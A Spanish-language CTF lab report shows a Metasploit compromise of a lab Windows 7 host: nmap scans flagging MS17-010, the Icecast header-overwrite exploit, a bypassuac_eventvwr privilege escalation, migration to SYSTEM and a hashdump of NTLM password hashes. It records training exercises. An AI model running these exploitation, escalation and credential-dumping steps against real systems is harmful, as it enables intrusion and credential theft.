Reporte de Vulnerabilidades – TryToHackMe Lab

Examen 1

Tarea 1

No información requerida.

Tarea 2

Puertos 3389 / 8000 detectados abiertos

┌──(root💀kali)-[/home/kali]
└─# nmap -T5 --script smb-vuln-ms17-010 10.10.6.210
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-19 16:00 EDT
Nmap scan report for 10.10.6.210
Host is up (0.13s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
8000/tcp open http-alt
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown

Host script results:

| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds

Icecast detectado
msf6 > search icecast
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header

Dark-PC (Maquina escaneada)

┌──(root💀kali)-[/home/kali]
└─# nmap -T5 -sV 10.10.6.210
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-19 15:52 EDT
Nmap scan report for 10.10.6.210
Host is up (0.13s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Tarea 3

Vulnerabilidad 2004 encontrada

msf6 > search icecast
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite

Modulo Metasploit utilizado

Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use
exploit/windows/http/icecast_header

Parametro cambiado RHOSTS

msf6 exploit(windows/http/icecast_header) > set RHOSTS 10.10.6.210
RHOSTS => 10.10.6.210
Tarea 4

BUILD del OS / Arquitectura

meterpreter > getuid
Server username: Dark-PC\Dark
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/Windows

Medio para subir privilegios

msf6 exploit(windows/http/icecast_header) > search post/multi/recon/local_

Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(windows/http/icecast_header) > use 0

msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):

Name Current Setting Required Description

---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1

session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.6.210 - Collecting local exploits for x86/windows...

[*] 10.10.6.210 - 40 exploit checks are being tried...
[+] 10.10.6.210 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.

Segundo parametron cambiado LHOST

msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.6.15.228
LHOST => 10.6.15.228

Resultado de getprivs
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
Tarea 5

Servicio migrado

meterpreter > ps
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
1368 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe

Permiso otorgado
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Contraseña del equipo
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
6